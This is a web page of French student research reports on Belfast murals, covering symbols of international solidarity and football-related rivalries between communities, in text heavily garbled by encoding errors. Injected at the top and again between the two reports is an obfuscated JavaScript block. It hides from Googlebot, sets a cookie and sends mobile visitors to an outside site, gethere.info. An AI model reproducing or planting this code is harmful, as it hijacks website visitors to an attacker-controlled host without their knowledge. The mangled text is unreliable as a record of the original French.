Internation-conflicts-on-the-wall (1)var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

SolidaritA� Internationale

Par Cynthia Feurly, Yoann Della Croce, Laetitia Maradan et Anna Paiuc

La solidaritA� entre les peuples se manifeste dans plusieurs rA�gions du monde touchA�es par un conflit, ca��est le cas en Irlande du Nord oA? les conflits civils ont eu lieu jusqua��en 1998, date officielle de la signature de la��accord de paix pour la��Irlande du Nord. Cependant aprA?s cette date, des actes de violences ont persistA�s bien que moins forts qua��auparavant. Dans le contexte de notre voyage da��A�tude A� Belfast, nous allons nous intA�resser aux symboles de solidaritA� internationale que nous pouvons trouver actuellement dans cette ville, faisant A�chos A� da��autres conflits da��indA�pendance dans le monde. Nous allons observer le degrA� de solidaritA� entre les peuples A� partir des reprA�sentations de conflits internationaux A� Belfast, que ce soit dans la��espace public – avec les murals, les faA�ades de magasins, les drapeaux aux fenA?tres des habitations – ou alors dans da��autres types de sources rA�coltA�es A� BelfastA�comme les inventaires des magasins de souvenirs ou les magazines de propagande. Ceci afin de voir si ces objets mettent en scA?ne une solidaritA� internationale premiA?rement, puis si tel est le cas, en mesurer le degrA�.

MalgrA� la��importance du travail sur le terrain, nous baserons notre cadre thA�orique sur des articles acadA�miques dA�jA� A�tudiA�s en amont de notre voyage de recherche. Parmi le nombre de symboles internationaux trouvA�s A� Belfast, nous allons principalement traiter du conflit israA�lo-palestinien et des revendications da��indA�pendance du Pays Basque et des Kurdes. La��occupation de la��espace public, via ces symboles, dA�montre une identification aux rA�volutionnaires pour les rA�publicains et inversement pour les unionistes. Nous nous demanderons dans quelle mesure ces symboles sont un moyen de crA�er une solidaritA� entre les peuples.

PremiA?rement, nous exposerons nos choix mA�thodologiques de dA�part, qui partent de la��observation de la��espace de deux quartiers centraux de la ville de Belfast (Falls et Shankill), puis de leur A�volution passant de la��espace public de la rue A� la��intA�rieur des magasins de souvenirs et A� l’inventaire des objets en vente. Ensuite nous ferons un retour critique sur notre dA�marche, discutant nos choix quant A� la mA�thode choisie, A� notre position de recherche et aux A�ventuels biais de notre analyse. Par la suite, nous allons faire part de nos rA�sultats de recherche qui dA�coulent de nos lectures, du terrain ainsi que de nos analyses critiques montrant une asymA�trie entre les deux camps, unionistes et rA�publicains, face A� la solidaritA� internationale. Finalement, une ouverture sera proposA�e sur les diffA�rentes pistes A� creuser car non abordA�e par manque de temps comme celles de remonter la filiA?re commerciale entre la��Irlande du Nord et les Pays-Basques ou la Palestine, pour confirmer la��existence da��une solidaritA� tangible.

MA�thodologie

Analyse des donnA�es rA�coltA�es sur le terrain

RA�sultats de la recherche

Conclusion

 

Bibliographie:

  1. Hassan Alkatib, Irlande & Palestine, 2014, [en ligne] https://www.youtube.com/watch?v=rAQ50VOeitM , consultA� le 12 janvier 2016.
  2. Debbie Lisle, Local Symbols, Global Networks: Rereading the Murals of Belfast, Alternatives: Global, Local, Political, Vol. 31, No. 1, Art and Politics (Jan.-Mar. 2006), pp.27-52, Sage Publications, Inc., [en ligne] http://www.jstor.org/stable/40645172 consultA� le 14 janvier 2016
  3. Pascal PragnA?re, A�A�Peintures murales en Irlande du Nord et au Pays basqueA�: mobilisation populaire et crA�ation da��identitA� nationaleA�A�, Les Cahiers du MIMMOC [En ligne], 5A�|A�2009, mis en ligne le 20 juin 2010 http://mimmoc.revues.org/405 consultA� le 14 janvier 2016
  4. Pascal PragnA?re, A�A�Circulations transnationalesA�: expressions murales partagA�es entre Irlande du Nord et Pays BasqueA�A�, Nuevo Mundo Mundos Nuevos [Online], Pictures, memories and sounds, Online since 14 December 2014, http://nuevomundo.revues.org/67509 consultA� le 15 January 2016
    http://nuevomundo.revues.org/67509#quotation
  5. A�Bill Rolston, Drawing Support: Murals in the North of Ireland, Belfast: Beyond the Pale Publications, 1992

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Football, i�?peintures murales et rivalitA�s

Arthur, Luis, JA�rome

Cette A�tude concerne les peintures murales de Belfast se rapportant au football et leur utilisation dans ce contexte particulier de pacification. En effet, ce sport occupe une place importante, tant dans la culture irlandaise qu’anglaise, expliquant son instrumentalisation par les diffA�rentes communautA�s. Il nous a donc paru pertinent d’A�tudier les opinions des habitants de Belfast concernant les peintures murales A� caractA?re footballistique. Pour mener A� bien notre travail, nous procA�derons A� des entretiens avec des Belfastois concernant leurs rA�actions face aux peintures murales que nous leur montrerons.

Introduction

Le football est sA�rement la��un des sports les plus pratiquA�s dans le monde, bien qua��il na��y ait pas de statistiques officielles, et permet particuliA?rement aux individus de se rassembler, ceci A� diffA�rentes A�chellesA�: locales, nationales et mondiales. Ca��est donc pour ces capacitA�s de rassemblement que nous avons pensA� A� mobiliser le football comme outil pour aborder le conflit survenu en Irlande du Nord entre loyalistes/unionistes (pour une Irlande du Nord rattachA�e au Royaume-Uni, de confession protestante) et nationalistes/rA�publicains (pour une RA�publique da��Irlande unie sans rapport avec la couronne, de confession catholique) jusqua��aux accords de paix signA�s en 1998.

Il existe un lien fort entre football et identitA�, la dimension compA�titive de ce sport cristallisant des enjeux identitaires. Ainsi, ce sport unit autant qua��il oppose (FauchA� et al., 2000). Cependant, dans ce travail nous A�tudierons principalement comment le soutien A� la��un des clubs de football belfastois favorise ou non un communautarisme, notamment religieux.

En Irlande du Nord, les championnats de football ont A�tA� bouleversA�s pendant le conflit (Ramonet, 1996). En effet, soutenir une A�quipe plutA?t qu’une autre dA�passait et semble encore dA�passer largement le monde du football, contrairement A� d’autres championnats europA�ens. Ainsi, on peut y voir en rA�alitA� le soutien portA� A� la cause nationaliste, A� travers les A�quipes catholiques, ou unioniste, A� travers les A�quipes protestantes. La ville de Belfast compte six clubs principaux, ce qui est rare, la plupart des villes en comptant beaucoup moins. Outre la��importance culturelle du football en Irlande du Nord, nous pouvons imaginer que le communautarisme, ainsi que la division spatiale et la limitation des dA�placements crA�A�es par les peacewalls expliquent cette prolifA�ration de clubs de football.

Cet objectif nous a donc conduit A� analyser les murals footballistiques et la faA�on dont ces fresques symbolisent une appartenance confessionnelle. Ainsi nous nous sommes demandA�s comment les Belfasois-es perA�oivent actuellement ces murals ? Nous souhaitons notamment A�tudier si les rivalitA�s communautaires A�autour du football existent toujours ou si elles se sont dissipA�es.

Selon nous, le football rassemblerait les diffA�rentes communautA�s nord-irlandaises derriA?re une mA?me A�quipe. Ainsi, nous A�mettons la��hypothA?se que les murals sur le football peuvent A?tre pacificatrices, du moins ceux reprA�sentant la��A�quipe nationale. Cette hypothA?se sa��appuie notamment sur la qualification de la��Irlande du Nord au championnat da��Europe de football 2016.

Nous avons pu remarquer que l’histoire de certains clubs sa��inscrit dans l’histoire des Troubles. En effet, certaines A�quipes n’avaient pour joueurs que des protestants ou que des catholiques. Certaines A�quipes ont cessA� leur activitA� pendant une pA�riode par crainte pour la sA�curitA� de leurs joueurs et de leurs supporters (DelanoA�, 2016). Aujourd’hui la rA�alitA� est diffA�rente. En effet, nous pouvons constater une plus grande mixitA� religieuse au sein des clubs de football belfastois. De plus, nous avons pu dA�couvrir la��histoire du football en Irlande et particuliA?rement le contexte de crA�ation des diffA�rents clubs de Belfast. Nous avons A�galement A�tA� trA?s intA�ressA�s par la transposition du conflit religieux entre A�quipes de football catholiques et protestantes en A�cosse. C’est une situation particuliA?re que nous dA�taillerons plus loin dans notre analyse.

MA�thodes utilisA�es

L’histoire des Troubles pouvant encore A?tre un sujet sensible pour les Belfastois-es, nous avons dA�cidA� de l’aborder A� travers le football, notamment en appuyant nos entretiens sur des reprA�sentations de peintures murales en rapport avec ce sport. Nous avons fait diffA�rentes recherches sur les peintures murales se rapportant au football. En prA�sentant nos images aux diffA�rents individus, nous pensions A?tre en mesure de leur demander ce qu’ils ressentent A� leur vue et qu’ils parleraient plus ouvertement du conflit passA� et de la situation actuelle.

Nous avons sA�lectionnA� trois images de murals (cf. annexes) : la��une da��un club protestant, la��une da��un club A�cossais catholique et une troisiA?me reprA�sentant la��A�quipe nationale. Nous avons choisi ces images afin de nous aider A� rA�pondre A� notre problA�matique, A� savoir la perception de ces murals par les habitants de Belfast. En effet, nous pensions que ces images nous permettraient da��aborder la��existence de clubs de football avec une appartenance religieuse catholique ou protestante et la possibilitA� de rassemblement A� travers la��A�quipe nationale, ce qui correspond A� nos hypothA?ses A�noncA�es plus loin.

  • L’image 1 figure un trA?fle A� rayures vertes A� cA?tA� d’un personnage du nom de Jimmy Johnstone. Ce dernier est un joueur de football d’origine A�cossaise qui a fait partie du Celtic Football Club, un club A�cossais. Il fut da��ailleurs A�lu meilleur joueur de tous les temps par les supporters de ce club (Glanville, 2006). Ce mural n’est pas anodin car il tA�moigne du fort attachement de la communautA� catholique nord-irlandaise A� ce club. En effet, avec la diaspora irlandaise en A�cosse, beaucoup d’amateurs de football irlandais catholiques soutiennent ce club qui fut destinA�, lors de sa crA�ation, au soutien de la communautA� celtique (McGuirk, 2009).
  • L’image 2 figure deux A�cussons : celui du Linfield Football and Athletic Club, ainsi que celui de l’A�quipe nationale nord-irlandaise, constituA�e principalement de joueurs protestants. Nous pouvons y lire « Proud supporters for Club and Country ». Ainsi, nous pouvons imaginer que les personnes affiliA�es A� ce club sont A�galements liA�es A� l’A�quipe nationale de l’Irlande du Nord. En effet, le club de Linfield a A�tA� crA�A� dans le quartier de Sandy Row, qui est habitA� par une communautA� majoritairement loyaliste. C’est, par ailleurs, le club avec le plus de succA?s A� Belfast et qui compte le plus de supporters (Garnham, 2004).
  • L’image 3 figure l’A�cusson de l’A�quipe nationale nord-irlandaise avec une inscription: « Northern Ireland Supporters Club ». Les drapeaux de l’Irlande du Nord et du Royaume-Uni sont reprA�sentA�s A� l’arriA?re-plan de l’image. Plus bas, nous pouvons A�galement lire « Our Wee Country », qui est un synonyme d’Irlande du Nord employA� par les locaux protestants. De plus, nous pouvons distinguer une couronne entre les deux drapeaux, ce qui tA�moigne l’allA�geance de l’Irlande du Nord au Royaume-Uni.

Une fois A� Belfast, nous avons malheureusement appris que les murals footballistiques avaient A�tA� recouverts. En effet, la��Association de Football nord-irlandaise (IFA) souhaite repeindre les slogans et les peintures murales exprimant une appartenance communautaire (BBC News, 2003). Notre problA�matique a donc dA� A?tre remodelA�e et nous avons dA�cidA� de nous dA�tacher des murals pour nous concentrer sur la��existence de rivalitA�s communautaires dans le football nord-irlandais. Nos hypothA?ses quant A� ces tensions identitaires A�taient les suivantes :

  • Lors de la pA�riode des Troubles les clubs de football de Belfast ont cristallisA� des rivalitA�s religieuses et politiques.
  • Dans le contexte post-conflit actuel, les rivalitA�s entre supporters sont purement sportives et tous les habitants de Belfast supportent l’A�quipe nationale, permettant la crA�ation d’une identitA� commune.

Nous pensions donc interviewer des habitants A� la��aide des images, mais nous avons fait nos entretiens sans les images puisque ces murals na��existaient plus et il nous semblait difficile de parler du ressenti de murals qui ont A�tA� recouverts. Nos entretiens se sont faits de maniA?re trA?s spontanA�e. Nous avions prA�parA� une grille da��entretien semi structurA�e, mais nous nous sommes rendus compte que les gens A�taient plus ouverts lors da��une discussion sans grille da��entretien et sans prise de notes.

Les gens avec qui nous avons eu des A�changes A�taient des individus rencontrA�s dans la rue ou dans des bars lors de diffusion de matchs, des employA�s de notre auberge, ainsi que les A�tudiants rencontrA�s et notre chauffeur de black cab (tour en taxi avec un ancien activiste catholique). Nous na��avions aucun critA?re pour sA�lectionner les personnes, nous avons parlA� avec les gens que nous avons rencontrA�s et qui voulait bien parler de football. Par ailleurs, pour pouvoir faire nos entretiens, il nous a fallu trouver des personnes intA�ressA�es par le football et disposA�es A� en discuter, ce qui n’est pas si A�vident en Irlande du Nord oA? le sport le plus regardA� est le rugby (Sugden et al., 1995).

Nous avons A�galement visitA� des lieux officiels du football belfastois. NA�anmoins, nous n’avons pas rA�ussi A� avoir de contacts avec des reprA�sentants de l’Association Irlandaise de Football, ceux-ci A�tant trop pris par les prA�paratifs du championnat europA�en 2016. De plus, nous n’avons pas pu visiter de centres d’entraA�nement car ils sont fermA�s au public, et aucun match n’A�tait prA�vu pendant notre prA�sence A� Belfast.

Contexte de discussion : Le football pendant et aprA?s les Troubles

Pendant la pA�riode des Troubles, la sociA�tA� nord-irlandaise A�tait clairement divisA�e entre rA�publicains/nationalistes de confession catholique d’un cA?tA� et loyalistes/unionistes de confession protestante de l’autre. D’habitude, l’affiliation A� un club de football, ou le simple fait de le supporter, tA�moigne de l’affirmation d’une identitA� territoriale et/ou politique et/ou religieuse. Sur la scA?ne belfastoise, et particuliA?rement pendant la pA�riode de conflit, ces deux derniA?res dimensions se sont trA?s accentuA�es. Ainsi, nous pouvons dire que ce sport a A�tA� A�instrumentalisA� par chacune des communautA�s pour exprimer une certaine appartenance identitaire, ce qui a da��ailleurs menA� A� de violents affrontements entre supporters. Par ailleurs, si le fait de supporter un club illustre l’appartenance A� une communautA� particuliA?re, nous pouvons dire qua��il en va de mA?me pour les A�quipes nationales. En novembre 1993, un match de qualification pour la coupe du monde de 1994 ayant lieu au Winsdor Park de Belfast opposait l’Irlande du Nord A� la RA�publique d’Irlande. Si la RA�publique d’Irlande gagnait, tout comme en cas d’A�galitA�, elle A�tait qualifiA�e. Quelques semaines auparavant, dix personnes ont A�tA�A�tuA�es lors d’une attaque A� la bombe par des membres de l’IRA[1]. Puis, peu aprA?s cet A�vA?nement, huit personnes furent tuA�es lors d’une attaque de l’UDA[2] en guise de revanche (Moriarty, 2016). Un tA�moignage de Michael O’Neill, un joueur de football nord-irlandais devenu entraA�neur de la sA�lection nationale en 2011, dA�crit l’atmosphA?re de cet A�vA�nement comme « mA�chante » et a�?malsaine » (Moriarty, 2016). Si le premier but nord-irlandais fit sauter de joie les supporters locaux, ravis d’anA�antir les espoirs de la rA�publique irlandaise d’aller en coupe du monde, l’A�galisation grA?ce au but d’Alan Mcloughlin ne fut pas saluA�e. Selon Michael O’Neill l’endroit le plus sA�r A�tait le terrain.

Cependant, Michael O’Neill affirme qu’aujourd’hui ces tensions se seraient dissipA�es dans une situation post-conflit. De plus, les catholiques d’Irlande du Nord seraient de plus en plus nombreux A� supporter l’A�quipe nationale d’Irlande du Nord, mA?me si la plupart prA�fA�reraient supporter l’A�quipe de la RA�publique d’Irlande. Aussi, il y a des joueurs tant catholiques que protestants dans l’A�quipe d’Irlande du Nord. Certains, A� l’image de Liam Boyce, se bA�nissent en faisant le signe de la croix avant de rentrer sur le terrain sans que cela ne dA�range les coA�quipiers. Il dit mA?me : « Nous sommes tous amis et ne voulons jouer qu’au football ». (Moriarty, 2016)

Cependant, cinq sur six des directeurs de l’IFA (Ireland Football Association) sont catholiques, ce qui montre que les divisions communautaires ne sont pas totalement dissipA�es du football en Irlande du Nord. (Moriarty, 2016)

La majoritA� des clubs belfastois est unioniste et a des supporters protestants. Cependant, comme dit prA�cA�demment, le football n’est pas le sport dominant en Irlande du Nord. Les A�quipes de premiA?re division ne sont que semi-professionnelles. Les supporters de football locaux prA�fA?rent ainsi supporter des A�quipes anglaises ou A�cossaises. Concernant les A�quipes A�cossaises, il y a un attachement fort aux A�quipes de la Old Firm. C’est un terme qui dA�signe l’affrontement entre les deux A�quipes rivales de Glasgow, les Rangers et les Celtics. En effet, comme dit prA�cA�demment, la ville de Glasgow compte une forte population irlandaise. Beaucoup de nord-irlandais catholiques supportent les Celtics de Glasgow, tandis que les protestants supportent les Glasgow Rangers. C’est le genre d’affrontement qui, mA?me aujourd’hui, est toujours source de tension (BBC News, 2006). Ainsi, mA?me aprA?s les Troubles, les supporters se provoquent en entonnant de chants communautaires, mA?me si ces derniers ont A�tA� interdits (Vice, 2012).

Par ailleurs, les tensions intercommunautaires se sont apaisA�es. NA�anmoins, des affrontements entre supporters peuvent encore avoir lieu. Par exemple, en 2005, des supporters de Linfield ont A�tA� attaquA�s par des jets de pierres de supporters de Derry City lorsqu’ils regagnaient les bus servant A� les ramener A� Belfast.

Nous pouvons donc comprendre que les rivalitA�s persistent. Ceci dit, nous avons menA� l’enquA?te, sur le terrain, pour discuter avec des personnes locales et savoir ce qu’ils en pensent.

Analyse des entretiens

Dans nos entretiens, il est ressorti que l’histoire des clubs de football a effectivement cristallisA� des rivalitA�s politiques et religieuses. La rA�ticence de certains A� en parler avec nous peut laisser penser que le football est encore un sujet sensible et suscite encore des rA�actions communautaires. Bien que le conflit soit terminA�, les esprits ne se sont pas apaisA�s pour autant et des rivalitA�s communautaires entre supporters persistent. Cependant, elles sont plus nuancA�es qua��auparavant. Ainsi, mA?me si les supporters ont toujours tendance A� s’identifier A� une A�quipe selon leurs croyances religieuses, ils acceptent que la confession d’un joueur diffA?re de celle du club et il est commun qu’un catholique joue pour Linfield (une A�quipe protestante) a�� un mA�lange qui A�tait trA?s rare A� la��A�poque du conflit. On peut donc remarquer que les rivalitA�s ne sont aujourda��hui pas sur le terrain mais dans les tribunes.

Par ailleurs, nous avons pu remarquer que le football na��occupe pas la place que nous avions imaginA�e. Plusieurs personnes avec qui nous avons A�changA� ont affirmA� ne pas A?tre familiA?res de ce monde et ce pour diffA�rentes raisons : un dA�sintA�rA?t, les performances moyennes des A�quipes, le nombre limitA� de matchs jouA�s A� Belfast ou encore le communautarisme qui serait toujours trop prA�sent entre les supporters et aurait ainsi un effet rA�pulsif. Lors da��une sortie de terrain, des ouvriers du stade (dont nous cherchions la��entrA�e) nous ont interpellA�s et nous ont demandA� ce qu’on cherchait. Nous leur avons rA�pondu que nous A�tions A�tudiants et que nous A�tions A� Belfast pour A�tudier le contexte post-conflit A� travers le football. On leur a demandA� s’ils A�taient supporters : deux a�� dont un portait un pull Liverpool FC a�� sur trois nous ont rA�pondu que oui. Mais aucun ne supporte d’A�quipes locales dans lesquelles le communautarisme est selon eux trop prA�sent. En effet, ce n’est pas uniquement parce que les A�quipes sont semi-professionnelles et que le niveau est bas, mais bel et bien A� cause des tensions communautaires qui subsistent. Ils ont ajoutA� que lors des matchs un lourd effectif de police est dA�ployA� (extrait de la��entretien nA� 6). Les rivalitA�s footballistiques dans cette situation post-conflit ne proviennent donc pas simplement du sport, mais A�galement du sentiment communautariste encore prA�sent.

Finalement, contrairement A� ce que nous avions pensA�, la��A�quipe da��Irlande du Nord na��est pas fA�dA�ratrice. Les supporters de cette A�quipe seraient en grande majoritA� des protestants et des dA�fenseurs de la cause loyaliste. Par ailleurs, les catholiques soutiennent l’A�quipe de la RA�publique d’Irlande, bien que certains commencent A� soutenir A�galement la��A�quipe da��Irlande du Nord da��aprA?s les recherches que nous avions fait au prA�alable. En effet, selon nos interlocuteurs, cela est dA� A� la faA�on dont les individus de chacune des deux communautA�s se dA�finissent et se revendiquent. Par exemple, un Ecossais se revendiquera comme a�?Scottisha�? dans un premier temps, puis comme faisant partie du royaume de Grande-Bretagne. Il en va de mA?me pour un Gallois. En revanche, en Irlande du Nord, A� cause du passA� politique et du caractA?re insulaire du territoire, l’identitA� britannique des loyalistes n’est pas assurA�e. C’est pourquoi, ils vont immA�diatement se prA�senter comme Britanniques et non comme Irlandais du Nord faisant partie du royaume de Grande-Bretagne (extrait de la��entretien nA� 5). A leur tour, les catholiques, eux, se voient comme appartenant A� la RA�publique d’Irlande et se revendiqueront comme Irlandais, ce qui fait persister les diffA�rences entre les deux communautA�s et empA?che la crA�ation da��une identitA� commune. Ainsi, la��identitA� nord-irlandaise passant au second plan, les partisans da��une Irlande unifiA�e ne peuvent sa��identifier A� l’A�quipe de l’Irlande du Nord car ce serait le comtA� de la��Ulster si la��Irlande A�tait unifiA�e. Y apporter son soutien reviendrait A� appuyer la cause unioniste et donc accepter la sA�paration entre la rA�publique da��Irlande et la��Irlande du Nord ce qui est encore difficile pour certains malgrA� les accords de paix.

Conclusion

En dA�finitive, nous pouvons estimer qua��il est correct de considA�rer le sport, et plus particuliA?rement le football, comme fA�dA�rateur. Cependant, dans le cas de Belfast ca��est une rA�alitA� bien plus complexe. Pendant les Troubles, chacune des communautA�s se rangeait derriA?re une A�quipe et sa��affrontait violemment lors des matchs. De plus, le dA�saccord qui subsiste depuis la signature du traitA� de paix de 1998 et le maintien du dA�sir da��une partie de la communautA� catholique rA�publicaines de voir la��Irlande unie fait de la��A�quipe nord-irlandaise un sujet de litiges. Le football demeure un terrain sensible dans lequel les sentiments personnels sont mA?lA�s. La rA�action de retrait de certains individus A� nos questions nous a laissA� la��entrevoir.

